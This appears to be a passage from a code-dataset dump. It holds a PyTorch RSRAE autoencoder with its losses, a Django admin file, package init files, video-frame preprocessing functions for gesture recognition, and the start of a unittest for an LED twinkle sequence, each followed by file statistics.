        self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
        self.dec_act2 = nn.ReLU(inplace=True)
        self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.output_act = nn.Tanh()

    def encode(self, x):
        """Map a (batch, C, 32, 32) image to a (batch, rep_dim) code in (-1, 1)."""
        for conv, bn, act in ((self.enc_conv1, self.enc_bn1, self.enc_act1),
                              (self.enc_conv2, self.enc_bn2, self.enc_act2),
                              (self.enc_conv3, self.enc_bn3, self.enc_act3)):
            x = act(bn(conv(x)))
        return self.rep_act(self.enc_fc(x.view(x.size(0), -1)))

    def decode(self, rep):
        """Map a (batch, rep_dim) code back to a (batch, C, 32, 32) image in (-1, 1)."""
        h = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
        h = h.view(-1, self.nf * 4, 4, 4)
        for conv, bn, act in ((self.dec_conv1, self.dec_bn1, self.dec_act1),
                              (self.dec_conv2, self.dec_bn2, self.dec_act2)):
            h = act(bn(conv(h)))
        return self.output_act(self.dec_conv3(h))

    def forward(self, x):
        """Encode then decode; returns the reconstruction."""
        return self.decode(self.encode(x))
class RSRAE(nn.Module):
    """Convolutional autoencoder with a Robust Subspace Recovery (RSR) layer.

    The encoder code is projected through a learned rep_dim x d matrix A onto
    a d-dimensional subspace and lifted back before decoding. forward returns
    (reconstruction, detached code, detached lifted code, A^T A) for the RSR
    losses.
    """

    def __init__(self, in_channels=3, rep_dim=256):
        super(RSRAE, self).__init__()
        nf = 64
        self.nf = nf
        # Encoder: three stride-2 convs (32x32 -> 4x4), then Linear + Tanh.
        self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
        self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
        self.enc_act1 = nn.ReLU(inplace=True)
        self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
        self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
        self.enc_act2 = nn.ReLU(inplace=True)
        self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
        self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
        self.enc_act3 = nn.ReLU(inplace=True)
        self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
        self.rep_act = nn.Tanh()
        # Robust Subspace Recovery: learned projection onto a d-dim subspace.
        d = 10
        self.A = nn.Parameter(torch.randn(rep_dim, d))
        # Decoder: mirror of the encoder with transposed convolutions.
        self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
        self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 * 4)
        self.dec_act0 = nn.ReLU(inplace=True)
        self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
        self.dec_act1 = nn.ReLU(inplace=True)
        self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
        self.dec_act2 = nn.ReLU(inplace=True)
        self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.output_act = nn.Tanh()

    def encode(self, x):
        """Map a (batch, C, 32, 32) image to a (batch, rep_dim) code in (-1, 1)."""
        for conv, bn, act in ((self.enc_conv1, self.enc_bn1, self.enc_act1),
                              (self.enc_conv2, self.enc_bn2, self.enc_act2),
                              (self.enc_conv3, self.enc_bn3, self.enc_act3)):
            x = act(bn(conv(x)))
        return self.rep_act(self.enc_fc(x.view(x.size(0), -1)))

    def decode(self, rep):
        """Map a (batch, rep_dim) code back to a (batch, C, 32, 32) image in (-1, 1)."""
        h = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
        h = h.view(-1, self.nf * 4, 4, 4)
        for conv, bn, act in ((self.dec_conv1, self.dec_bn1, self.dec_act1),
                              (self.dec_conv2, self.dec_bn2, self.dec_act2)):
            h = act(bn(conv(h)))
        return self.output_act(self.dec_conv3(h))

    def forward(self, x):
        """Return (reconstruction, detached code, detached lifted code, A^T A)."""
        code = self.encode(x)
        # Project the code onto the RSR subspace and lift it back.
        proj = code @ self.A
        lifted = (self.A @ proj.t()).t()
        # Row-wise L2 normalization before decoding; eps avoids division by zero.
        norms = torch.norm(lifted, dim=1).unsqueeze(-1).repeat(1, lifted.size(1))
        rec = self.decode(lifted / (norms + 1e-10))
        # Detached copies feed the RSR losses without backprop through the encoder.
        code_d = code.detach()
        proj_d = code_d @ self.A
        lifted_d = (self.A @ proj_d.t()).t()
        gram = self.A.t() @ self.A
        return rec, code_d, lifted_d, gram
class RSRAE_plus(nn.Module):
    """RSRAE variant whose forward keeps gradients flowing into the RSR terms.

    Unlike RSRAE, the returned code and lifted code are NOT detached, so the
    RSR losses backpropagate through the encoder as well.
    """

    def __init__(self, in_channels=3, rep_dim=256):
        super(RSRAE_plus, self).__init__()
        nf = 64
        self.nf = nf
        # Encoder: three stride-2 convs (32x32 -> 4x4), then Linear + Tanh.
        self.enc_conv1 = nn.Conv2d(in_channels=in_channels, out_channels=nf, kernel_size=3, stride=2, padding=1)
        self.enc_bn1 = nn.BatchNorm2d(num_features=nf)
        self.enc_act1 = nn.ReLU(inplace=True)
        self.enc_conv2 = nn.Conv2d(in_channels=nf, out_channels=nf * 2, kernel_size=3, stride=2, padding=1)
        self.enc_bn2 = nn.BatchNorm2d(num_features=nf * 2)
        self.enc_act2 = nn.ReLU(inplace=True)
        self.enc_conv3 = nn.Conv2d(in_channels=nf * 2, out_channels=nf * 4, kernel_size=3, stride=2, padding=1)
        self.enc_bn3 = nn.BatchNorm2d(num_features=nf * 4)
        self.enc_act3 = nn.ReLU(inplace=True)
        self.enc_fc = nn.Linear(nf * 4 * 4 * 4, rep_dim)
        self.rep_act = nn.Tanh()
        # Robust Subspace Recovery: learned projection onto a d-dim subspace.
        d = 10
        self.A = nn.Parameter(torch.randn(rep_dim, d))
        # Decoder: mirror of the encoder with transposed convolutions.
        self.dec_fc = nn.Linear(rep_dim, nf * 4 * 4 * 4)
        self.dec_bn0 = nn.BatchNorm1d(num_features=nf * 4 * 4 * 4)
        self.dec_act0 = nn.ReLU(inplace=True)
        self.dec_conv1 = nn.ConvTranspose2d(in_channels=nf * 4, out_channels=nf * 2, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.dec_bn1 = nn.BatchNorm2d(num_features=nf * 2)
        self.dec_act1 = nn.ReLU(inplace=True)
        self.dec_conv2 = nn.ConvTranspose2d(in_channels=nf * 2, out_channels=nf, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.dec_bn2 = nn.BatchNorm2d(num_features=nf)
        self.dec_act2 = nn.ReLU(inplace=True)
        self.dec_conv3 = nn.ConvTranspose2d(in_channels=nf, out_channels=in_channels, kernel_size=3, stride=2, padding=1, output_padding=1)
        self.output_act = nn.Tanh()

    def encode(self, x):
        """Map a (batch, C, 32, 32) image to a (batch, rep_dim) code in (-1, 1)."""
        for conv, bn, act in ((self.enc_conv1, self.enc_bn1, self.enc_act1),
                              (self.enc_conv2, self.enc_bn2, self.enc_act2),
                              (self.enc_conv3, self.enc_bn3, self.enc_act3)):
            x = act(bn(conv(x)))
        return self.rep_act(self.enc_fc(x.view(x.size(0), -1)))

    def decode(self, rep):
        """Map a (batch, rep_dim) code back to a (batch, C, 32, 32) image in (-1, 1)."""
        h = self.dec_act0(self.dec_bn0(self.dec_fc(rep)))
        h = h.view(-1, self.nf * 4, 4, 4)
        for conv, bn, act in ((self.dec_conv1, self.dec_bn1, self.dec_act1),
                              (self.dec_conv2, self.dec_bn2, self.dec_act2)):
            h = act(bn(conv(h)))
        return self.output_act(self.dec_conv3(h))

    def forward(self, x):
        """Return (reconstruction, code, lifted code, A^T A) — all with gradients."""
        code = self.encode(x)
        # Project the code onto the RSR subspace and lift it back.
        proj = code @ self.A
        lifted = (self.A @ proj.t()).t()
        gram = self.A.t() @ self.A
        # Row-wise L2 normalization before decoding; eps avoids division by zero.
        norms = torch.norm(lifted, dim=1).unsqueeze(-1).repeat(1, lifted.size(1))
        rec = self.decode(lifted / (norms + 1e-10))
        return rec, code, lifted, gram
class L21Loss(nn.Module):
    """L2,1 norm of the residual: sum over rows of the per-row L2 norm of (x - y)."""

    def __init__(self):
        super(L21Loss, self).__init__()

    def forward(self, x, y):
        # Per-row Euclidean norm of the difference, accumulated over the batch.
        return torch.norm(x - y, dim=1, p=2).sum()
class RSR1Loss(nn.Module):
    """RSR projection loss: L2,1 distance between the lifted code hr and the code h."""

    def __init__(self):
        super(RSR1Loss, self).__init__()
        # Build the L21Loss once here instead of allocating a fresh module on
        # every forward call (the original re-instantiated it per call).
        self.l21 = L21Loss()

    def forward(self, hr, h):
        return self.l21(hr, h)
class RSR2Loss(nn.Module):
    """RSR orthogonality loss: Frobenius norm of (A^T A - I).

    Pushes the RSR matrix A towards orthonormal columns, so that A^T A
    approaches the identity.
    """

    def __init__(self):
        super(RSR2Loss, self).__init__()

    def forward(self, AA):
        # BUG FIX: the penalty is ||A^T A - I|| with I the IDENTITY matrix.
        # The original used torch.ones_like(AA) (an all-ones matrix), which
        # wrongly rewards off-diagonal mass and penalizes the unit diagonal.
        I = torch.eye(AA.size(0), dtype=AA.dtype, device=AA.device)
        return torch.norm(AA - I)
| 37.695082
| 139
| 0.625468
| 1,771
| 11,497
| 3.862789
| 0.074534
| 0.061395
| 0.041807
| 0.04473
| 0.859962
| 0.845637
| 0.818009
| 0.814062
| 0.803537
| 0.803537
| 0
| 0.048068
| 0.234583
| 11,497
| 304
| 140
| 37.819079
| 0.729318
| 0.018179
| 0
| 0.72093
| 0
| 0
| 0.004261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.023256
| 0.004651
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
773f939d45b43e6c4553b4236ae85768b5b394ac
| 142
|
py
|
Python
|
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | null | null | null |
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | 3
|
2021-08-13T10:10:21.000Z
|
2021-08-16T10:10:04.000Z
|
app/expenses/admin.py
|
esdevop/mymodb
|
392f1024d32cb1e19f39841a7811a4b990813909
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Expense, ExpensesGroup
# Expose both expense models in the Django admin with the default ModelAdmin.
admin.site.register(ExpensesGroup)
admin.site.register(Expense)
| 20.285714
| 42
| 0.830986
| 18
| 142
| 6.555556
| 0.555556
| 0.305085
| 0.372881
| 0.508475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091549
| 142
| 6
| 43
| 23.666667
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
774ad1b82e6bebbc0bccc4a1752ae888b70f8d93
| 86
|
py
|
Python
|
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
fitapp/tests/__init__.py
|
brad/django-fitbit
|
39278068980a81bb67868b024b09683810cbc9f7
|
[
"Apache-2.0"
] | null | null | null |
from fitapp.tests.test_retrieval import *
from fitapp.tests.test_integration import *
| 28.666667
| 43
| 0.837209
| 12
| 86
| 5.833333
| 0.583333
| 0.285714
| 0.428571
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 44
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
658515ff98bd28aa97fc595a836575f1b3a85604
| 38
|
py
|
Python
|
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | null | null | null |
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | 11
|
2021-03-11T17:28:29.000Z
|
2022-01-05T11:35:14.000Z
|
psat_server_web/__init__.py
|
genghisken/psat-server-web
|
63c697f1d08dc2173328d3018aadf8efc1e8e14f
|
[
"MIT"
] | null | null | null |
from . import atlas
from . import ps1
| 12.666667
| 19
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.210526
| 38
| 2
| 20
| 19
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
65af30bd42e97ec87cc5a026bc2b472ffe6d9f4b
| 10,593
|
py
|
Python
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 10
|
2019-05-30T01:20:10.000Z
|
2022-03-24T07:43:15.000Z
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 1
|
2021-01-09T01:32:58.000Z
|
2021-01-09T01:49:41.000Z
|
networks/inputs.py
|
GuangmingZhu/ConvLSTMForGR
|
14d68f599214f3474819f73512c6faec42df61a2
|
[
"MIT"
] | 3
|
2019-11-28T06:09:44.000Z
|
2020-12-01T08:48:09.000Z
|
import io
import os
import sys
import math
import random
import numpy as np
from scipy.misc import imread, imresize
def load_iso_video_list(path):
    """Parse an isolated-gesture video list file.

    Each line has the form ``<videopath> <framecount> <label>`` with
    single-space separators.

    Args:
        path: path to the list file (must exist).

    Returns:
        (video_data, video_label): ``video_data`` maps a zero-padded index key
        ('000000', '000001', ...) to ``{'videopath': str, 'framecnt': int}``;
        ``video_label`` is the list of integer labels in file order.
    """
    assert os.path.exists(path)
    # Context manager guarantees the file handle is closed even if parsing raises.
    with open(path, 'r') as f:
        f_lines = f.readlines()
    video_data = {}
    video_label = []
    for idx, line in enumerate(f_lines):
        # Split once instead of re-splitting the same line for every field.
        fields = line.split(' ')
        video_data['%06d' % idx] = {
            'videopath': fields[0],
            'framecnt': int(fields[1]),
        }
        video_label.append(int(fields[2]))
    return video_data, video_label
def prepare_iso_rgb_data(image_info):
    """Load and preprocess a fixed number of RGB frames from one video directory.

    Args:
        image_info: sequence of (video_path, video_frame_cnt, output_frame_cnt,
            start_frame_idx, is_training). Frames are read from
            ``<video_path>/<NNNNNN>.jpg``.

    Returns:
        np.float32 array of shape (output_frame_cnt, 112, 112, 3): square-cropped,
        resized frames with the per-channel mean [112, 112, 112] subtracted.
    """
    video_path = image_info[0]
    video_frame_cnt = image_info[1]
    output_frame_cnt = image_info[2]
    start_frame_idx = image_info[3]
    is_training = image_info[4]
    assert os.path.exists(video_path)
    # Choose output_frame_cnt frame indices spread across the whole video.
    rand_frames = np.zeros(output_frame_cnt)
    div = float(video_frame_cnt) / float(output_frame_cnt)
    scale = math.floor(div)
    if is_training:
        if scale == 0:
            # Fewer frames than requested: use all of them, pad with the last.
            rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
            rand_frames[video_frame_cnt::] = video_frame_cnt - 1
        elif scale == 1:
            rand_frames[::] = div * np.arange(0, output_frame_cnt)
        else:
            # Uniform spacing plus per-frame random jitter (temporal augmentation).
            rand_frames[::] = div * np.arange(0, output_frame_cnt) + \
                              float(scale) / 2 * (np.random.random(size=output_frame_cnt) - 0.5)
    else:
        if scale == 0:
            rand_frames[0:video_frame_cnt] = np.arange(0, video_frame_cnt)
            rand_frames[video_frame_cnt::] = video_frame_cnt - 1
        else:
            rand_frames[::] = div * np.arange(0, output_frame_cnt)
    # Clamp endpoints to the valid range, then offset by the first frame index.
    rand_frames[0] = max(rand_frames[0], 0)
    rand_frames[output_frame_cnt - 1] = min(rand_frames[output_frame_cnt - 1], video_frame_cnt - 1)
    rand_frames = np.floor(rand_frames) + start_frame_idx
    average_values = [112, 112, 112]
    processed_images = np.empty((output_frame_cnt, 112, 112, 3), dtype=np.float32)
    # One crop offset shared by every frame so the clip is spatially consistent.
    crop_random = random.random()
    # range (not the Python-2-only xrange) keeps this Python 3 compatible.
    for idx in range(0, output_frame_cnt):
        image_file = '%s/%06d.jpg' % (video_path, rand_frames[idx])
        assert os.path.exists(image_file)
        # NOTE(review): scipy.misc.imread/imresize were removed in SciPy >= 1.3;
        # migrate to imageio.imread + PIL/cv2 resize when upgrading SciPy.
        image = imread(image_file)
        image_h, image_w, _ = np.shape(image)
        square_sz = min(image_h, image_w)
        if is_training:
            # Random (clip-consistent) square crop for augmentation.
            crop_h = int((image_h - square_sz) * crop_random)
            crop_w = int((image_w - square_sz) * crop_random)
        else:
            # Deterministic center crop at evaluation time.
            crop_h = int((image_h - square_sz) / 2)
            crop_w = int((image_w - square_sz) / 2)
        image_crop = image[crop_h:crop_h + square_sz, crop_w:crop_w + square_sz, ::]
        processed_images[idx] = imresize(image_crop, (112, 112)) - average_values
    return processed_images
def prepare_iso_depth_data(image_info):
    """Load a fixed-length clip of depth frames for an IsoGD video.

    Parameters packed in ``image_info``:
        [0] video_path       -- directory holding ``%06d.jpg`` frame files
        [1] video_frame_cnt  -- number of frames available on disk
        [2] output_frame_cnt -- number of frames to sample for the clip
        [3] start_frame_idx  -- numbering offset of the first frame file
        [4] is_training      -- enables temporal jitter and random cropping

    Returns a float32 array of shape (output_frame_cnt, 112, 112, 3) with
    [127, 127, 127] subtracted per channel (presumably the depth-stream
    mean -- confirm against the training setup).
    """
    (video_path, frame_total, clip_len,
     first_idx, training) = image_info[:5]
    assert os.path.exists(video_path)

    # --- choose which frame indices to read -------------------------------
    step = float(frame_total) / float(clip_len)
    whole_step = math.floor(step)
    picks = np.zeros(clip_len)
    if whole_step == 0:
        # Fewer source frames than requested: take them all, pad with last.
        picks[0:frame_total] = np.arange(0, frame_total)
        picks[frame_total::] = frame_total - 1
    elif training and whole_step >= 2:
        # Evenly spaced picks with per-frame random temporal jitter.
        jitter = float(whole_step) / 2 * (np.random.random(size=clip_len) - 0.5)
        picks[::] = step * np.arange(0, clip_len) + jitter
    else:
        # Evenly spaced picks, no jitter.
        picks[::] = step * np.arange(0, clip_len)
    # Clamp endpoints into the valid frame range, then shift to file numbers.
    picks[0] = max(picks[0], 0)
    picks[clip_len - 1] = min(picks[clip_len - 1], frame_total - 1)
    picks = np.floor(picks) + first_idx

    # --- read, square-crop, resize and normalize each frame ---------------
    mean_depth = [127, 127, 127]
    clip = np.empty((clip_len, 112, 112, 3), dtype=np.float32)
    crop_frac = random.random()  # one crop offset shared by the whole clip
    for slot, frame_no in enumerate(picks):
        frame_path = '%s/%06d.jpg' % (video_path, frame_no)
        assert os.path.exists(frame_path)
        frame = imread(frame_path)
        height, width, _ = np.shape(frame)
        side = min(height, width)
        if training:
            top = int((height - side) * crop_frac)
            left = int((width - side) * crop_frac)
        else:  # centered crop at evaluation time
            top = int((height - side) / 2)
            left = int((width - side) / 2)
        square = frame[top:top + side, left:left + side, ::]
        clip[slot] = imresize(square, (112, 112)) - mean_depth
    return clip
def prepare_iso_flow_data(image_info):
    """Load a fixed-length clip of optical-flow frames for an IsoGD video.

    Parameters packed in ``image_info``:
        [0] video_path       -- directory holding ``%06d.jpg`` frame files
        [1] video_frame_cnt  -- number of frames available on disk
        [2] output_frame_cnt -- number of frames to sample for the clip
        [3] start_frame_idx  -- numbering offset of the first frame file
        [4] is_training      -- enables temporal jitter and random cropping

    Returns a float32 array of shape (output_frame_cnt, 112, 112, 3) with
    [128, 128, 128] subtracted per channel (flow images are presumably
    encoded around a 128 zero-point -- confirm).
    """
    (video_path, frame_total, clip_len,
     first_idx, training) = image_info[:5]
    assert os.path.exists(video_path)

    # --- choose which frame indices to read -------------------------------
    step = float(frame_total) / float(clip_len)
    whole_step = math.floor(step)
    picks = np.zeros(clip_len)
    if whole_step == 0:
        # Fewer source frames than requested: take them all, pad with last.
        picks[0:frame_total] = np.arange(0, frame_total)
        picks[frame_total::] = frame_total - 1
    elif training and whole_step >= 2:
        # Evenly spaced picks with per-frame random temporal jitter.
        jitter = float(whole_step) / 2 * (np.random.random(size=clip_len) - 0.5)
        picks[::] = step * np.arange(0, clip_len) + jitter
    else:
        # Evenly spaced picks, no jitter.
        picks[::] = step * np.arange(0, clip_len)
    # Clamp endpoints into the valid frame range, then shift to file numbers.
    picks[0] = max(picks[0], 0)
    picks[clip_len - 1] = min(picks[clip_len - 1], frame_total - 1)
    picks = np.floor(picks) + first_idx

    # --- read, square-crop, resize and normalize each frame ---------------
    mean_flow = [128, 128, 128]
    clip = np.empty((clip_len, 112, 112, 3), dtype=np.float32)
    crop_frac = random.random()  # one crop offset shared by the whole clip
    for slot, frame_no in enumerate(picks):
        frame_path = '%s/%06d.jpg' % (video_path, frame_no)
        assert os.path.exists(frame_path)
        frame = imread(frame_path)
        height, width, _ = np.shape(frame)
        side = min(height, width)
        if training:
            top = int((height - side) * crop_frac)
            left = int((width - side) * crop_frac)
        else:  # centered crop at evaluation time
            top = int((height - side) / 2)
            left = int((width - side) / 2)
        square = frame[top:top + side, left:left + side, ::]
        clip[slot] = imresize(square, (112, 112)) - mean_flow
    return clip
def prepare_jester_rgb_data(image_info):
    """Load a fixed-length clip of RGB frames for a Jester video.

    Parameters packed in ``image_info``:
        [0] video_path       -- directory holding ``%05d.jpg`` frame files
        [1] video_frame_cnt  -- number of frames available on disk
        [2] output_frame_cnt -- number of frames to sample for the clip
        [3] start_frame_idx  -- numbering offset of the first frame file
        [4] is_training      -- enables temporal jitter and random cropping

    Returns a float32 array of shape (output_frame_cnt, 112, 112, 3) with
    [114, 109, 104] subtracted per channel (presumably the Jester RGB
    mean -- confirm against the training setup).
    """
    (video_path, frame_total, clip_len,
     first_idx, training) = image_info[:5]
    assert os.path.exists(video_path)

    # --- choose which frame indices to read -------------------------------
    step = float(frame_total) / float(clip_len)
    whole_step = math.floor(step)
    picks = np.zeros(clip_len)
    if whole_step == 0:
        # Fewer source frames than requested: take them all, pad with last.
        picks[0:frame_total] = np.arange(0, frame_total)
        picks[frame_total::] = frame_total - 1
    elif training and whole_step >= 2:
        # Evenly spaced picks with per-frame random temporal jitter.
        jitter = float(whole_step) / 2 * (np.random.random(size=clip_len) - 0.5)
        picks[::] = step * np.arange(0, clip_len) + jitter
    else:
        # Evenly spaced picks, no jitter.
        picks[::] = step * np.arange(0, clip_len)
    # Clamp endpoints into the valid frame range, then shift to file numbers.
    picks[0] = max(picks[0], 0)
    picks[clip_len - 1] = min(picks[clip_len - 1], frame_total - 1)
    picks = np.floor(picks) + first_idx

    # --- read, square-crop, resize and normalize each frame ---------------
    mean_rgb = [114, 109, 104]
    clip = np.empty((clip_len, 112, 112, 3), dtype=np.float32)
    crop_frac = random.random()  # one crop offset shared by the whole clip
    for slot, frame_no in enumerate(picks):
        # NOTE: Jester frames are zero-padded to five digits, not six.
        frame_path = '%s/%05d.jpg' % (video_path, frame_no)
        assert os.path.exists(frame_path)
        frame = imread(frame_path)
        height, width, _ = np.shape(frame)
        side = min(height, width)
        if training:
            top = int((height - side) * crop_frac)
            left = int((width - side) * crop_frac)
        else:  # centered crop at evaluation time
            top = int((height - side) / 2)
            left = int((width - side) / 2)
        square = frame[top:top + side, left:left + side, ::]
        clip[slot] = imresize(square, (112, 112)) - mean_rgb
    return clip
def prepare_jester_flow_data(image_info):
    """Load a fixed-length clip of optical-flow frames for a Jester video.

    Parameters packed in ``image_info``:
        [0] video_path       -- directory holding ``%06d.jpg`` frame files
        [1] video_frame_cnt  -- RGB frame count; one fewer flow frame is
            usable (flow is presumably computed between consecutive
            frames, hence the ``- 1`` below -- confirm)
        [2] output_frame_cnt -- number of frames to sample for the clip
        [3] start_frame_idx  -- numbering offset of the first frame file
        [4] is_training      -- enables temporal jitter and random cropping

    Returns a float32 array of shape (output_frame_cnt, 112, 112, 3) with
    [128, 128, 128] subtracted per channel.
    """
    (video_path, raw_frame_cnt, clip_len,
     first_idx, training) = image_info[:5]
    frame_total = raw_frame_cnt - 1
    assert os.path.exists(video_path)

    # --- choose which frame indices to read -------------------------------
    step = float(frame_total) / float(clip_len)
    whole_step = math.floor(step)
    picks = np.zeros(clip_len)
    if whole_step == 0:
        # Fewer source frames than requested: take them all, pad with last.
        picks[0:frame_total] = np.arange(0, frame_total)
        picks[frame_total::] = frame_total - 1
    elif training and whole_step >= 2:
        # Evenly spaced picks with per-frame random temporal jitter.
        jitter = float(whole_step) / 2 * (np.random.random(size=clip_len) - 0.5)
        picks[::] = step * np.arange(0, clip_len) + jitter
    else:
        # Evenly spaced picks, no jitter.
        picks[::] = step * np.arange(0, clip_len)
    # Clamp endpoints into the valid frame range, then shift to file numbers.
    picks[0] = max(picks[0], 0)
    picks[clip_len - 1] = min(picks[clip_len - 1], frame_total - 1)
    picks = np.floor(picks) + first_idx

    # --- read, square-crop, resize and normalize each frame ---------------
    mean_flow = [128, 128, 128]
    clip = np.empty((clip_len, 112, 112, 3), dtype=np.float32)
    crop_frac = random.random()  # one crop offset shared by the whole clip
    for slot, frame_no in enumerate(picks):
        frame_path = '%s/%06d.jpg' % (video_path, frame_no)
        assert os.path.exists(frame_path)
        frame = imread(frame_path)
        height, width, _ = np.shape(frame)
        side = min(height, width)
        if training:
            top = int((height - side) * crop_frac)
            left = int((width - side) * crop_frac)
        else:  # centered crop at evaluation time
            top = int((height - side) / 2)
            left = int((width - side) / 2)
        square = frame[top:top + side, left:left + side, ::]
        clip[slot] = imresize(square, (112, 112)) - mean_flow
    return clip
| 39.526119
| 91
| 0.698952
| 1,711
| 10,593
| 3.981297
| 0.059614
| 0.129184
| 0.104962
| 0.05138
| 0.937317
| 0.929683
| 0.929683
| 0.929683
| 0.929683
| 0.929683
| 0
| 0.032103
| 0.1737
| 10,593
| 267
| 92
| 39.674157
| 0.746144
| 0
| 0
| 0.866142
| 0
| 0
| 0.007553
| 0
| 0
| 0
| 0
| 0
| 0.043307
| 1
| 0.023622
| false
| 0
| 0.027559
| 0
| 0.074803
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65b177df48fa1120e83e66d748733bc09cee1b64
| 3,087
|
py
|
Python
|
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
Sequences/twinkle_test.py
|
weidnerm/pi-ws2812
|
87840f43adca9d76d3cb565893de91329b8e99b2
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from twinkle import StarObject;
class TestStringMethods(unittest.TestCase):
    """Exercise StarObject.handleTick over one full twinkle cycle.

    The expected command sequence is: two dark ticks, a ramp up to the
    full color ff7f3f, a hold at full color, a ramp back down to black,
    a dark pause, and the first step of the next ramp.
    """

    m_Star = None

    def setUp(self):
        # Fixed-configuration star; positional argument meanings are
        # defined by StarObject in twinkle.py (full color 0xff7f3f).
        self.m_Star = StarObject(4, 6, 8, 10, int("ff7f3f", 16), 2, 20, 0)

    def tearDown(self):
        self.m_Star = None

    def test_split(self):
        # Expected fill color for each successive tick, in order.
        expected_colors = (
            ['000000'] * 2 +
            ['3f1f0f', '7f3f1f', 'bf5f2f'] +
            ['ff7f3f'] * 7 +
